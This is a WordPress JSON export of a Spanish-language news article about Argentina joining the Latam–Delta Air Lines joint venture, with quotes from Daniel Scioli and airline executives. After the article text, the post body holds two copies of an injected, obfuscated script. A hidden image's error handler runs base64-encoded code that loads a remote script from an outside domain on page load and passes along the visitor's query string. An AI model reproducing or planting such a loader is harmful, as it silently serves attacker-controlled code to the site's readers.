{"id":5279,"date":"2025-06-26T11:27:31","date_gmt":"2025-06-26T14:27:31","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5279"},"modified":"2025-08-13T23:29:00","modified_gmt":"2025-08-14T02:29:00","slug":"scioli-agradecio-contar-con-mas-conectividad-en-el-marco-de-la-libertad-que-se-da-en-argentina","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5279","title":{"rendered":"Scioli agradeci\u00f3 contar con \u201cm\u00e1s conectividad en el marco de la libertad que se da en Argentina\u201d"},"content":{"rendered":"\n<p><strong><em>El funcionario nacional lo afirm\u00f3 durante el lanzamiento de una alianza estrat\u00e9gica celebrada entre las empresas a\u00e9reas Latam y Delta, la que incluir\u00e1 al pa\u00eds.<\/em><\/strong><\/p>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;<strong>Daniel Scioli<\/strong>, asisti\u00f3 al evento de incorporaci\u00f3n oficial de&nbsp;<strong>Argentina al joint venture<\/strong>&nbsp;entre las compa\u00f1\u00edas&nbsp;<strong>Latam<\/strong>&nbsp;y&nbsp;<strong>Delta Air Lines<\/strong>&nbsp;para viajar a&nbsp;<strong>Estados Unidos<\/strong>&nbsp;y&nbsp;<strong>Canad\u00e1<\/strong>. El encuentro se realiz\u00f3 en un hotel porte\u00f1o.<\/p>\n\n\n\n<p><strong>Scioli<\/strong>&nbsp;reconoci\u00f3 el m\u00e9rito de la alianza lograda y la enmarc\u00f3&nbsp;<em>\u201cen lo que el presidente Milei ha definido como un sector estrat\u00e9gico para la recuperaci\u00f3n de la econom\u00eda argentina, que es la industria del Turismo\u201d<\/em>. En tal sentido, record\u00f3 que el mandatario&nbsp;<em>\u201cpuso en marcha una pol\u00edtica de cielos abiertos con desregulaciones, desburocratizando, facilitando en todo momento que ocurran grandes cosas que permitan tener m\u00e1s Argentina en el mundo y m\u00e1s mundo en la Argentina\u201d. \u201cSe dice que la uni\u00f3n hace la fuerza y la integraci\u00f3n nos da esta oportunidad maravillosa de tener m\u00e1s conectividad en el marco de la libertad que se da en Argentina\u201d<\/em>, puntualiz\u00f3.<\/p>\n\n\n\n<p>Asimismo, el secretario asegur\u00f3:&nbsp;<em>\u201cVamos hacia viajeros que participan activamente en eventos corporativos. Estamos viendo un crecimiento constante de congresos, convenciones. Un turista m\u00e1s exigente, que busca la naturaleza, estad\u00edas m\u00e1s largas, consume m\u00e1s y busca hoteler\u00eda de excelencia\u201d<\/em>. Por \u00faltimo, dijo que Argentina&nbsp;<em>\u201ces un pa\u00eds estable, es un pa\u00eds seguro, con orden en el espacio p\u00fablico, que ha dado un salto cualitativo en todos sus servicios y que tiene mucha m\u00e1s conectividad a\u00e9rea\u201d<\/em>.<\/p>\n\n\n\n<p><strong>Ramiro Alfons\u00edn<\/strong>, vicepresidente comercial de&nbsp;<strong>LATAM<\/strong>, en su intervenci\u00f3n celebr\u00f3:&nbsp;<em>\u201clo que es una expansi\u00f3n de nuestro JV \u2014joint venture\u2014\u201d. \u201cNosotros llevamos ya dos a\u00f1os con este JV en Latinoam\u00e9rica y ahora se expande a Argentina\u201d<\/em>, explic\u00f3.&nbsp;<em>\u201cNuestra red en Argentina ha crecido much\u00edsimo\u201d<\/em>, agreg\u00f3 y asegur\u00f3 que la aerol\u00ednea se convirti\u00f3 en el primer operador que m\u00e1s tr\u00e1fico transporta entre Argentina y el resto del mundo.<\/p>\n\n\n\n<p><strong>Perry Cantarutti<\/strong>, vicepresidente senior de Alianzas y Mercados Internacionales de&nbsp;<strong>Delta Air Lines<\/strong>, explic\u00f3:&nbsp;<em>\u201cEsta alianza estrat\u00e9gica no solo representa una expansi\u00f3n de nuestras redes, sino una profunda integraci\u00f3n operativa que nos permite maximizar nuestra oferta a los clientes, lograr eficiencias operativas y ofrecer una propuesta de valor superior\u201d<\/em>. Adem\u00e1s destac\u00f3 que&nbsp;<em>\u201ces el resultado de a\u00f1os de planificaci\u00f3n y alineaci\u00f3n estrat\u00e9gica entre dos compa\u00f1\u00edas l\u00edderes, unidas por un objetivo com\u00fan: transformar la conectividad entre Sudam\u00e9rica y Norteam\u00e9rica\u201d<\/em>.<\/p>\n\n\n\n<p>Con la incorporaci\u00f3n de&nbsp;<strong>Argentina<\/strong>&nbsp;al acuerdo entre las dos aerol\u00edneas, ser\u00e1 posible que los pasajeros accedan a una red de m\u00e1s de&nbsp;<strong>300 destinos<\/strong>&nbsp;entre&nbsp;<strong>Estados Unidos, Canad\u00e1 y Sudam\u00e9rica<\/strong>. La alianza busca fortalecer la conectividad a\u00e9rea y ofrecer mejores servicios. Los miembros de los programas de viajero frecuente de ambas aerol\u00edneas,&nbsp;<strong>SkyMiles y LATAM Pass<\/strong>, tambi\u00e9n se beneficiar\u00e1n de la acumulaci\u00f3n y canje de millas en vuelos de la otra compa\u00f1\u00eda.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El funcionario nacional lo afirm\u00f3 durante el lanzamiento de una alianza estrat\u00e9gica celebrada entre las empresas a\u00e9reas Latam y Delta, la que incluir\u00e1 al pa\u00eds. El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;Daniel Scioli, asisti\u00f3 al evento de incorporaci\u00f3n oficial de&nbsp;Argentina al joint venture&nbsp;entre las compa\u00f1\u00edas&nbsp;Latam&nbsp;y&nbsp;Delta Air Lines&nbsp;para viajar a&nbsp;Estados Unidos&nbsp;y&nbsp;Canad\u00e1. El encuentro [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5280,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5,20,18],"tags":[],"class_list":{"0":"post-5279","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos","8":"category-empresas","9":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5279"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5279"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5279\/revisions"}],"predecessor-version":[{"id":6455,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5279\/revisions\/6455"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5280"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5279"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5279"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5279"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}